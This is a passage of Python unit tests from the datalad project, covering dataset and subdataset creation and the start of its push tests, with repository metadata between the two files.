'git submodule add' cannot handle paths starting with -.\n u'ds-' + OBSCURE_FILENAME: {\n 'file2': 'file2',\n 'subsub': {\n 'file3': 'file3'}}}}\n\nraw = dict(return_type='list', result_filter=None, result_xfm=None, on_failure='ignore')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_create_raises(path=None, outside_path=None):\n ds = Dataset(path)\n # incompatible arguments (annex only):\n assert_raises(ValueError, ds.create, annex=False, description='some')\n\n with open(op.join(path, \"somefile.tst\"), 'w') as f:\n f.write(\"some\")\n # non-empty without `force`:\n assert_in_results(\n ds.create(force=False, **raw),\n status='error',\n message='will not create a dataset in a non-empty directory, use `--force` option to ignore')\n # non-empty with `force`:\n ds.create(force=True)\n # create sub outside of super:\n assert_in_results(\n ds.create(outside_path, **raw),\n status='error',\n message=(\n 'dataset containing given paths is not underneath the reference '\n 'dataset %s: %s', ds, outside_path))\n obscure_ds = u\"ds-\" + OBSCURE_FILENAME\n # create a sub:\n ds.create(obscure_ds)\n # fail when doing it again\n assert_in_results(\n ds.create(obscure_ds, **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n\n # now deinstall the sub and fail trying to create a new one at the\n # same location\n ds.drop(obscure_ds, what='all', reckless='kill', recursive=True)\n assert_in(obscure_ds, ds.subdatasets(state='absent', result_xfm='relpaths'))\n # and now should fail to also create inplace or under\n assert_in_results(\n ds.create(obscure_ds, **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n assert_in_results(\n ds.create(op.join(obscure_ds, 'subsub'), **raw),\n status='error',\n message=('collision with %s (dataset) in dataset %s',\n str(ds.pathobj / obscure_ds),\n ds.path)\n )\n os.makedirs(op.join(ds.path, 'down'))\n with open(op.join(ds.path, 'down', \"someotherfile.tst\"), 'w') as f:\n f.write(\"someother\")\n ds.save()\n assert_in_results(\n ds.create('down', **raw),\n status='error',\n message=('collision with content in parent dataset at %s: %s',\n ds.path,\n [str(ds.pathobj / 'down' / 'someotherfile.tst')]),\n )\n\n\n@with_tempfile\ndef test_create_force_subds(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"subds\")\n # We get an error when trying calling create in an existing subdataset\n assert_in_results(\n subds.create(force=False, **raw),\n status=\"error\")\n # ... but we can force it\n assert_in_results(\n subds.create(force=True, **raw),\n status=\"ok\")\n # ... 
even if it is uninstalled.\n subds.drop(what='all', reckless='kill', recursive=True)\n ok_(not subds.is_installed())\n assert_in_results(\n subds.create(force=True, **raw),\n status=\"ok\")\n\n\n@with_tempfile\n@with_tempfile\ndef test_create_curdir(path=None, path2=None):\n with chpwd(path, mkdir=True):\n create()\n ds = Dataset(path)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=True)\n\n with chpwd(path2, mkdir=True):\n create(annex=False)\n ds = Dataset(path2)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=False)\n ok_(op.exists(op.join(ds.path, '.noannex')))\n\n\n@with_tempfile\n@with_tempfile\ndef test_create(probe=None, path=None):\n # only as a probe whether this FS is a crippled one\n ar = AnnexRepo(probe, create=True)\n\n ds = Dataset(path)\n ds.create(\n description=\"funny\",\n # custom git init option\n initopts=dict(shared='world') if not ar.is_managed_branch() else None)\n ok_(ds.is_installed())\n assert_repo_status(ds.path, annex=True)\n\n # check default backend\n (ds.pathobj / \"f1\").write_text(\"1\")\n ds.save()\n eq_(ds.repo.get_file_backend([\"f1\"]), ['MD5E'])\n\n if not ar.is_managed_branch():\n eq_(ds.config.get(\"core.sharedrepository\"), '2')\n # check description in `info`\n cmlout = ds.repo.call_annex(['info'])\n assert_in('funny [here]', cmlout)\n # check dataset ID\n eq_(ds.config.get_value('datalad.dataset', 'id'),\n ds.id)\n\n\n@with_tempfile\ndef test_create_sub(path=None):\n\n ds = Dataset(path)\n ds.create()\n\n # 1. create sub and add to super:\n subds = ds.create(op.join(\"some\", \"what\", \"deeper\"))\n ok_(isinstance(subds, Dataset))\n ok_(subds.is_installed())\n assert_repo_status(subds.path, annex=True)\n assert_in(\n 'submodule.some/what/deeper.datalad-id={}'.format(\n subds.id),\n list(ds.repo.call_git_items_(['config', '--file', '.gitmodules',\n '--list'],\n read_only=True))\n )\n\n # subdataset is known to superdataset:\n assert_in(op.join(\"some\", \"what\", \"deeper\"),\n ds.subdatasets(result_xfm='relpaths'))\n # and was committed:\n assert_repo_status(ds.path)\n\n # subds finds superdataset\n ok_(subds.get_superdataset() == ds)\n\n # 2. create sub without adding to super:\n subds2 = Dataset(op.join(path, \"someother\")).create()\n ok_(isinstance(subds2, Dataset))\n ok_(subds2.is_installed())\n assert_repo_status(subds2.path, annex=True)\n\n # unknown to superdataset:\n assert_not_in(\"someother\", ds.subdatasets(result_xfm='relpaths'))\n\n # 3. 
create sub via super:\n subds3 = ds.create(\"third\", annex=False)\n ok_(isinstance(subds3, Dataset))\n ok_(subds3.is_installed())\n assert_repo_status(subds3.path, annex=False)\n assert_in(\"third\", ds.subdatasets(result_xfm='relpaths'))\n\n\n@with_tempfile\ndef test_create_sub_gh3463(path=None):\n ds = Dataset(path)\n ds.create()\n\n # Test non-bound call.\n with chpwd(ds.path):\n create(\"subds0\", dataset=\".\")\n assert_repo_status(ds.path)\n\n # Test command-line invocation directly.\n Runner(cwd=ds.path).run([\"datalad\", \"create\", \"-d.\", \"subds1\"])\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_create_dataset_same_as_path(path=None):\n with chpwd(path):\n ds = create(dataset=\".\", path=\".\")\n assert_repo_status(ds.path)\n\n\n@with_tempfile\ndef test_create_sub_dataset_dot_no_path(path=None):\n ds = Dataset(path)\n ds.create()\n\n # Test non-bound call.\n sub0_path = str(ds.pathobj / \"sub0\")\n os.mkdir(sub0_path)\n with chpwd(sub0_path):\n subds0 = create(dataset=\".\")\n assert_repo_status(ds.path, untracked=[subds0.path])\n assert_repo_status(subds0.path)\n\n # Test command-line invocation directly (regression from gh-3484).\n sub1_path = str(ds.pathobj / \"sub1\")\n os.mkdir(sub1_path)\n Runner(cwd=sub1_path).run([\"datalad\", \"create\", \"-d.\"])\n assert_repo_status(ds.path, untracked=[subds0.path, sub1_path])\n\n\n@with_tree(tree=_dataset_hierarchy_template)\ndef test_create_subdataset_hierarchy_from_top(path=None):\n # how it would look like to overlay a subdataset hierarchy onto\n # an existing directory tree\n ds = Dataset(op.join(path, 'origin')).create(force=True)\n # we got a dataset ....\n ok_(ds.is_installed())\n # ... but it has untracked content\n ok_(ds.repo.dirty)\n subds = ds.create(u\"ds-\" + OBSCURE_FILENAME, force=True)\n ok_(subds.is_installed())\n ok_(subds.repo.dirty)\n subsubds = subds.create('subsub', force=True)\n ok_(subsubds.is_installed())\n ok_(subsubds.repo.dirty)\n ok_(ds.id != subds.id != subsubds.id)\n ds.save(updated=True, recursive=True)\n # 'file*' in each repo was untracked before and should remain as such\n # (we don't want a #1419 resurrection\n ok_(ds.repo.dirty)\n ok_(subds.repo.dirty)\n ok_(subsubds.repo.dirty)\n # if we add these three, we should get clean\n ds.save([\n 'file1',\n op.join(subds.path, 'file2'),\n op.join(subsubds.path, 'file3')])\n assert_repo_status(ds.path)\n ok_(ds.id != subds.id != subsubds.id)\n\n\n@with_tempfile\ndef test_nested_create(path=None):\n # to document some more organic usage pattern\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n lvl2relpath = op.join('lvl1', 'lvl2')\n lvl2path = op.join(ds.path, lvl2relpath)\n os.makedirs(lvl2path)\n os.makedirs(op.join(ds.path, 'lvl1', 'empty'))\n with open(op.join(lvl2path, 'file'), 'w') as f:\n f.write('some')\n ok_(ds.save())\n # Empty directories are filtered out.\n assert_repo_status(ds.path, untracked=[])\n # later create subdataset in a fresh dir\n # WINDOWS FAILURE IS NEXT LINE\n subds1 = ds.create(op.join('lvl1', 'subds'))\n assert_repo_status(ds.path, untracked=[])\n eq_(ds.subdatasets(result_xfm='relpaths'), [op.join('lvl1', 'subds')])\n # later create subdataset in an existing empty dir\n subds2 = ds.create(op.join('lvl1', 'empty'))\n assert_repo_status(ds.path)\n # later try to wrap existing content into a new subdataset\n # but that won't work\n assert_in_results(\n ds.create(lvl2relpath, **raw),\n status='error',\n message=(\n 'collision with content in parent dataset at %s: %s',\n ds.path, 
[op.join(lvl2path, 'file')]))\n # even with force, as to do this properly complicated surgery would need to\n # take place\n # MIH disable shaky test till proper dedicated upfront check is in-place in `create`\n # gh-1725\n #assert_in_results(\n # ds.create(lvl2relpath, force=True,\n # on_failure='ignore', result_xfm=None, result_filter=None),\n # status='error', action='add')\n # only way to make it work is to unannex the content upfront\n ds.repo.call_annex(['unannex', op.join(lvl2relpath, 'file')])\n # nothing to save, git-annex commits the unannex itself, but only on v5\n ds.repo.commit()\n # still nothing without force\n # \"err='lvl1/lvl2' already exists in the index\"\n assert_in_results(\n ds.create(lvl2relpath, **raw),\n status='error',\n message='will not create a dataset in a non-empty directory, use `--force` option to ignore')\n # XXX even force doesn't help, because (I assume) GitPython doesn't update\n # its representation of the Git index properly\n ds.create(lvl2relpath, force=True)\n assert_in(lvl2relpath, ds.subdatasets(result_xfm='relpaths'))\n\n\n# Imported from #1016\n@with_tree({'ds2': {'file1.txt': 'some'}})\ndef test_saving_prior(topdir=None):\n # the problem is that we might be saving what is actually needed to be\n # \"created\"\n\n # we would like to place this structure into a hierarchy of two datasets\n # so we create first top one\n ds1 = create(topdir, force=True)\n # and everything is ok, stuff is not added BUT ds1 will be considered dirty\n assert_repo_status(ds1.path, untracked=['ds2'])\n # And then we would like to initiate a sub1 subdataset\n ds2 = create('ds2', dataset=ds1, force=True)\n # But what will happen is file1.txt under ds2 would get committed first into\n # ds1, and then the whole procedure actually crashes since because ds2/file1.txt\n # is committed -- ds2 is already known to git and it just pukes with a bit\n # confusing 'ds2' already exists in the index\n assert_in('ds2', ds1.subdatasets(result_xfm='relpaths'))\n\n\n@with_tempfile(mkdir=True)\ndef test_create_withcfg(path=None):\n ds = create(\n dataset=path,\n cfg_proc=['yoda'])\n assert_repo_status(path)\n assert (ds.pathobj / 'README.md').exists()\n\n # If we are creating a dataset within a reference dataset, we save _after_\n # the procedure runs.\n ds.create('subds', cfg_proc=['yoda'])\n assert_repo_status(path)\n assert (ds.pathobj / 'subds' / 'README.md').exists()\n\n\n@with_tempfile(mkdir=True)\ndef test_create_fake_dates(path=None):\n ds = create(path, fake_dates=True)\n\n ok_(ds.config.getbool(\"datalad\", \"fake-dates\"))\n ok_(ds.repo.fake_dates_enabled)\n\n # Another instance detects the fake date configuration.\n ok_(Dataset(path).repo.fake_dates_enabled)\n\n first_commit = ds.repo.get_revisions(options=[\"--reverse\", \"--all\"])[0]\n\n eq_(ds.config.obtain(\"datalad.fake-dates-start\") + 1,\n int(ds.repo.format_commit(\"%ct\", first_commit)))\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_passthrough(path=None):\n runner = Runner()\n _ = runner.run(\n ['datalad',\n '-c', 'annex.tune.objecthash1=true',\n '-c', 'annex.tune.objecthashlower=true',\n 'create', path])\n ds = Dataset(path)\n eq_(ds.config.get('annex.tune.objecthash1', None), 'true')\n eq_(ds.config.get('annex.tune.objecthashlower', None), 'true')\n\n\n@with_tree({\"empty\": {\".git\": {}, \"ds\": {}},\n \"nonempty\": {\".git\": {\"bogus\": \"content\"}, \"ds\": {}},\n \"git_with_head\": {\".git\": {\"HEAD\": \"\"}, \"ds\": {}}\n })\ndef test_empty_git_upstairs(topdir=None):\n # create() doesn't get confused by an 
empty .git/ upstairs (gh-3473)\n assert_in_results(\n create(op.join(topdir, \"empty\", \"ds\"), **raw),\n status=\"ok\", type=\"dataset\", action=\"create\")\n # ... and it will ignore non-meaningful content in .git\n assert_in_results(\n create(op.join(topdir, \"nonempty\", \"ds\"), **raw),\n status=\"ok\", type=\"dataset\", action=\"create\")\n # ... but it will raise if it detects a valid repo\n # (by existence of .git/HEAD as defined in GitRepo._valid_git_test_path)\n with assert_raises(CommandError):\n create(op.join(topdir, \"git_with_head\", \"ds\"), **raw)\n\n\n@with_tempfile(mkdir=True)\ndef check_create_obscure(create_kwargs, path):\n with chpwd(path):\n with swallow_outputs():\n ds = create(result_renderer=\"default\", **create_kwargs)\n ok_(ds.is_installed())\n\n\[email protected](\"kwarg\", [\"path\", \"dataset\"])\ndef test_create_with_obscure_name(kwarg):\n check_create_obscure, {\"kwarg\": OBSCURE_FILENAME}\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\ndef check_create_path_semantics(\n cwd, create_ds, path_arg, base_path, other_path):\n ds = Dataset(base_path).create()\n os.makedirs(op.join(ds.path, 'some'))\n target_path = ds.pathobj / \"some\" / \"what\" / \"deeper\"\n with chpwd(\n other_path if cwd == 'elsewhere' else\n base_path if cwd == 'parentds' else\n str(ds.pathobj / 'some') if cwd == 'subdir' else\n str(Path.cwd())):\n subds = create(\n dataset=ds.path if create_ds == 'abspath'\n else str(ds.pathobj.relative_to(cwd)) if create_ds == 'relpath'\n else ds if create_ds == 'instance'\n else create_ds,\n path=str(target_path) if path_arg == 'abspath'\n else str(target_path.relative_to(ds.pathobj)) if path_arg == 'relpath'\n else op.join('what', 'deeper') if path_arg == 'subdir_relpath'\n else path_arg)\n eq_(subds.pathobj, target_path)\n\n\[email protected](\n \"cwd,create_ds,path_arg\",\n [\n ('subdir', None, 'subdir_relpath'),\n ('subdir', 'abspath', 'subdir_relpath'),\n ('subdir', 'abspath', 'abspath'),\n ('parentds', None, 'relpath'),\n ('parentds', 'abspath', 'relpath'),\n ('parentds', 'abspath', 'abspath'),\n (None, 'abspath', 'abspath'),\n (None, 'instance', 'abspath'),\n (None, 'instance', 'relpath'),\n ('elsewhere', 'abspath', 'abspath'),\n ('elsewhere', 'instance', 'abspath'),\n ('elsewhere', 'instance', 'relpath'),\n ]\n)\ndef test_create_relpath_semantics(cwd, create_ds, path_arg):\n check_create_path_semantics(cwd, create_ds, path_arg)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_gh2927(path=None, linkpath=None):\n if has_symlink_capability():\n # make it more complicated by default\n Path(linkpath).symlink_to(path, target_is_directory=True)\n path = linkpath\n ds = Dataset(path).create()\n ds.create('subds_clean')\n assert_status('ok', ds.create(op.join('subds_clean', 'subds_lvl1_clean'),\n result_xfm=None, return_type='list'))\n\n\n@with_tempfile(mkdir=True)\ndef check_create_initopts_form(form, path=None):\n path = Path(path)\n\n template_dir = path / \"templates\"\n template_dir.mkdir()\n (template_dir / \"foo\").write_text(\"\")\n\n forms = {\"list\": [f\"--template={template_dir}\"],\n \"dict\": {\"template\": str(template_dir)}}\n\n ds = Dataset(path / \"ds\")\n ds.create(initopts=forms[form])\n ok_exists(ds.repo.dot_git / \"foo\")\n\n\[email protected](\"form\", [\"dict\", \"list\"])\ndef test_create_initopts_form(form):\n check_create_initopts_form(form)\n\n\n@with_tempfile\ndef test_bad_cfg_proc(path=None):\n ds = Dataset(path)\n # check if error is raised for incorrect cfg_proc\n assert_raises(ValueError, ds.create, 
path=path, cfg_proc='unknown')\n # verify that no directory got created prior to the error\n assert not op.isdir(path)\n" }, { "alpha_fraction": 0.6220980286598206, "alphanum_fraction": 0.6277368664741516, "avg_line_length": 38.135189056396484, "blob_id": "678b48b91592f013fd2e3b3daf7aaf88f64a5c9f", "content_id": "690d9b35b7dc8aa0a829be06f87b08b22f177888", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39370, "license_type": "permissive", "max_line_length": 146, "num_lines": 1006, "path": "/datalad/core/distributed/tests/test_push.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test push\n\n\"\"\"\n\nimport logging\nimport os\n\nimport pytest\n\nfrom datalad.core.distributed.clone import Clone\nfrom datalad.core.distributed.push import Push\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n known_failure_githubci_osx,\n known_failure_githubci_win,\n neq_,\n ok_,\n ok_file_has_content,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n path_startswith,\n swallow_outputs,\n)\n\nDEFAULT_REFSPEC = \"refs/heads/{0}:refs/heads/{0}\".format(DEFAULT_BRANCH)\n\nckwa = dict(\n result_renderer='disabled',\n)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_invalid_call(origin=None, tdir=None):\n ds = Dataset(origin).create()\n # no target\n assert_status('impossible', ds.push(on_failure='ignore'))\n # no dataset\n with chpwd(tdir):\n assert_raises(InsufficientArgumentsError, Push.__call__)\n # dataset, but outside path\n assert_raises(IncompleteResultsError, ds.push, path=tdir)\n # given a path constraint that doesn't match anything, will cause\n # nothing to be done\n assert_status('notneeded', ds.push(path=ds.pathobj / 'nothere'))\n\n # unavailable subdataset\n dummy_sub = ds.create('sub')\n dummy_sub.drop(what='all', reckless='kill', recursive=True)\n assert_in('sub', ds.subdatasets(state='absent', result_xfm='relpaths'))\n # now an explicit call to publish the unavailable subdataset\n assert_raises(ValueError, ds.push, 'sub')\n\n target = mk_push_target(ds, 'target', tdir, annex=True)\n # revision that doesn't exist\n assert_raises(\n ValueError,\n ds.push, to='target', since='09320957509720437523')\n\n # If a publish() user accidentally passes since='', which push() spells as\n # since='^', the call is aborted.\n assert_raises(\n ValueError,\n ds.push, to='target', since='')\n\n\ndef mk_push_target(ds, name, path, annex=True, bare=True):\n # life could be simple, but nothing is simple on windows\n 
#src.create_sibling(dst_path, name='target')\n if annex:\n if bare:\n target = GitRepo(path=path, bare=True, create=True)\n # cannot use call_annex()\n target.call_git(['annex', 'init'])\n else:\n target = AnnexRepo(path, init=True, create=True)\n if not target.is_managed_branch():\n # for managed branches we need more fireworks->below\n target.config.set(\n 'receive.denyCurrentBranch', 'updateInstead',\n scope='local')\n else:\n target = GitRepo(path=path, bare=bare, create=True)\n ds.siblings('add', name=name, url=path, result_renderer='disabled')\n if annex and not bare and target.is_managed_branch():\n # maximum complication\n # the target repo already has a commit that is unrelated\n # to the source repo, because it has built a reference\n # commit for the managed branch.\n # the only sane approach is to let git-annex establish a shared\n # history\n if AnnexRepo.git_annex_version > \"8.20210631\":\n ds.repo.call_annex(['sync', '--allow-unrelated-histories'])\n else:\n ds.repo.call_annex(['sync'])\n ds.repo.call_annex(['sync', '--cleanup'])\n return target\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_push(annex, src_path, dst_path):\n # prepare src\n src = Dataset(src_path).create(annex=annex)\n src_repo = src.repo\n # push should not add branches to the local dataset\n orig_branches = src_repo.get_branches()\n assert_not_in('synced/' + DEFAULT_BRANCH, orig_branches)\n\n res = src.push(on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res, status='impossible',\n message='No push target given, and none could be auto-detected, '\n 'please specify via --to')\n eq_(orig_branches, src_repo.get_branches())\n # target sibling\n target = mk_push_target(src, 'target', dst_path, annex=annex)\n eq_(orig_branches, src_repo.get_branches())\n\n res = src.push(to=\"target\")\n eq_(orig_branches, src_repo.get_branches())\n assert_result_count(res, 2 if annex else 1)\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['new-branch'])\n\n assert_repo_status(src_repo, annex=annex)\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # configure a default merge/upstream target\n src.config.set('branch.{}.remote'.format(DEFAULT_BRANCH),\n 'target', scope='local')\n src.config.set('branch.{}.merge'.format(DEFAULT_BRANCH),\n DEFAULT_BRANCH, scope='local')\n\n # don't fail when doing it again, no explicit target specification\n # needed anymore\n res = src.push()\n eq_(orig_branches, src_repo.get_branches())\n # and nothing is pushed\n assert_status('notneeded', res)\n\n assert_repo_status(src_repo, annex=annex)\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # some modification:\n (src.pathobj / 'test_mod_file').write_text(\"Some additional stuff.\")\n src.save(to_git=True, message=\"Modified.\")\n (src.pathobj / 'test_mod_annex_file').write_text(\"Heavy stuff.\")\n src.save(to_git=not annex, message=\"Modified again.\")\n assert_repo_status(src_repo, annex=annex)\n\n # we could say since='HEAD~2' to make things fast, or we are lazy\n # and say since='^' to indicate the state of the tracking remote\n # which is the same, because we made to commits since the last push.\n res = src.push(to='target', since=\"^\", jobs=2)\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n # we get to see what happened\n 
operations=['fast-forward'])\n if annex:\n # we got to see the copy result for the annexed files\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'))\n # we published, so we can drop and reobtain\n ok_(src_repo.file_has_content('test_mod_annex_file'))\n src_repo.drop('test_mod_annex_file')\n ok_(not src_repo.file_has_content('test_mod_annex_file'))\n src_repo.get('test_mod_annex_file')\n ok_(src_repo.file_has_content('test_mod_annex_file'))\n ok_file_has_content(\n src_repo.pathobj / 'test_mod_annex_file',\n 'Heavy stuff.')\n\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n if not (annex and src_repo.is_managed_branch()):\n # the following doesn't make sense in managed branches, because\n # a commit that could be amended is no longer the last commit\n # of a branch after a sync has happened (which did happen\n # during the last push above\n\n # amend and change commit msg in order to test for force push:\n src_repo.commit(\"amended\", options=['--amend'])\n # push should be rejected (non-fast-forward):\n res = src.push(to='target', since='HEAD~2', on_failure='ignore')\n # fails before even touching the annex branch\n assert_in_results(\n res,\n action='publish', status='error', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['rejected', 'error'])\n # push with force=True works:\n res = src.push(to='target', since='HEAD~2', force='gitpush')\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['forced-update'])\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # we do not have more branches than we had in the beginning\n # in particular no 'synced/<default branch>'\n eq_(orig_branches, src_repo.get_branches())\n\n\[email protected](\"annex\", [False, True])\ndef test_push(annex):\n check_push(annex)\n\n\ndef check_datasets_order(res, order='bottom-up'):\n \"\"\"Check that all type=dataset records not violating the expected order\n\n it is somewhat weak test, i.e. records could be produced so we\n do not detect that order is violated, e.g. a/b c/d would satisfy\n either although they might be neither depth nor breadth wise. 
But\n this test would allow to catch obvious violations like a, a/b, a\n \"\"\"\n prev = None\n for r in res:\n if r.get('type') != 'dataset':\n continue\n if prev and r['path'] != prev:\n if order == 'bottom-up':\n assert_false(path_startswith(r['path'], prev))\n elif order == 'top-down':\n assert_false(path_startswith(prev, r['path']))\n else:\n raise ValueError(order)\n prev = r['path']\n\n\n@slow # 33sec on Yarik's laptop\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True, suffix='sub')\n@with_tempfile(mkdir=True, suffix='subnoannex')\n@with_tempfile(mkdir=True, suffix='subsub')\ndef test_push_recursive(\n origin_path=None, src_path=None, dst_top=None, dst_sub=None, dst_subnoannex=None, dst_subsub=None):\n # dataset with two submodules and one subsubmodule\n origin = Dataset(origin_path).create()\n origin_subm1 = origin.create('sub m')\n origin_subm1.create('subsub m')\n origin.create('subm noannex', annex=False)\n origin.save()\n assert_repo_status(origin.path)\n # prepare src as a fresh clone with all subdatasets checkout out recursively\n # running on a clone should make the test scenario more different than\n # test_push(), even for the pieces that should be identical\n top = Clone.__call__(source=origin.path, path=src_path)\n subs = top.get('.', recursive=True, get_data=False, result_xfm='datasets')\n # order for '.' should not be relied upon, so sort by path\n sub, subsub, subnoannex = sorted(subs, key=lambda ds: ds.path)\n\n target_top = mk_push_target(top, 'target', dst_top, annex=True)\n # subdatasets have no remote yet, so recursive publishing should fail:\n res = top.push(to=\"target\", recursive=True, on_failure='ignore')\n check_datasets_order(res)\n assert_in_results(\n res, path=top.path, type='dataset',\n refspec=DEFAULT_REFSPEC,\n operations=['new-branch'], action='publish', status='ok',\n target='target')\n for d in (sub, subsub, subnoannex):\n assert_in_results(\n res, status='error', type='dataset', path=d.path,\n message=(\"Unknown target sibling '%s'.\",\n 'target'))\n # now fix that and set up targets for the submodules\n target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)\n target_subnoannex = mk_push_target(\n subnoannex, 'target', dst_subnoannex, annex=False)\n target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)\n\n # and same push call as above\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n # topds skipped\n assert_in_results(\n res, path=top.path, type='dataset',\n action='publish', status='notneeded', target='target')\n # the rest pushed\n for d in (sub, subsub, subnoannex):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # all corresponding branches match across all datasets\n for s, d in zip((top, sub, subnoannex, subsub),\n (target_top, target_sub, target_subnoannex,\n target_subsub)):\n eq_(list(s.repo.get_branch_commits_(DEFAULT_BRANCH)),\n list(d.get_branch_commits_(DEFAULT_BRANCH)))\n if s != subnoannex:\n eq_(list(s.repo.get_branch_commits_(\"git-annex\")),\n list(d.get_branch_commits_(\"git-annex\")))\n\n # rerun should not result in further pushes of the default branch\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n assert_not_in_results(\n res, status='ok', refspec=DEFAULT_REFSPEC)\n assert_in_results(\n res, status='notneeded', refspec=DEFAULT_REFSPEC)\n\n # now annex a file in subsub\n test_copy_file = subsub.pathobj / 'test_mod_annex_file'\n 
test_copy_file.write_text(\"Heavy stuff.\")\n # save all the way up\n assert_status(\n ('ok', 'notneeded'),\n top.save(message='subsub got something', recursive=True))\n assert_repo_status(top.path)\n # publish straight up, should be smart by default\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n # we see 3 out of 4 datasets pushed (sub noannex was left unchanged)\n for d in (top, sub, subsub):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # file content copied too\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(test_copy_file))\n # verify it is accessible, drop and bring back\n assert_status('ok', top.drop(str(test_copy_file)))\n ok_(not subsub.repo.file_has_content('test_mod_annex_file'))\n top.get(test_copy_file)\n ok_file_has_content(test_copy_file, 'Heavy stuff.')\n\n # make two modification\n (sub.pathobj / 'test_mod_annex_file').write_text('annex')\n (subnoannex.pathobj / 'test_mod_file').write_text('git')\n # save separately\n top.save(sub.pathobj, message='annexadd', recursive=True)\n top.save(subnoannex.pathobj, message='gitadd', recursive=True)\n # now only publish the latter one\n res = top.push(to=\"target\", since=DEFAULT_BRANCH + '~1', recursive=True)\n # nothing copied, no reports on the other modification\n assert_not_in_results(res, action='copy')\n assert_not_in_results(res, path=sub.path)\n for d in (top, subnoannex):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # an unconditional push should now pick up the remaining changes\n res = top.push(to=\"target\", recursive=True)\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(sub.pathobj / 'test_mod_annex_file'))\n assert_in_results(\n res, status='ok', type='dataset', path=sub.path,\n refspec=DEFAULT_REFSPEC)\n for d in (top, subnoannex, subsub):\n assert_in_results(\n res, status='notneeded', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n\n # if noannex target gets some annex, we still should not fail to push\n target_subnoannex.call_git(['annex', 'init'])\n # just to ensure that we do need something to push\n (subnoannex.pathobj / \"newfile\").write_text(\"content\")\n subnoannex.save()\n res = subnoannex.push(to=\"target\")\n assert_in_results(res, status='ok', type='dataset')\n\n\n@slow # 12sec on Yarik's laptop\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_push_subds_no_recursion(src_path=None, dst_top=None, dst_sub=None, dst_subsub=None):\n # dataset with one submodule and one subsubmodule\n top = Dataset(src_path).create()\n sub = top.create('sub m')\n test_file = sub.pathobj / 'subdir' / 'test_file'\n test_file.parent.mkdir()\n test_file.write_text('some')\n subsub = sub.create(sub.pathobj / 'subdir' / 'subsub m')\n top.save(recursive=True)\n assert_repo_status(top.path)\n target_top = mk_push_target(top, 'target', dst_top, annex=True)\n target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)\n target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)\n # now publish, but NO recursion, instead give the parent dir of\n # both a subdataset and a file in the middle subdataset\n res = top.push(\n to='target',\n # give relative to top dataset to 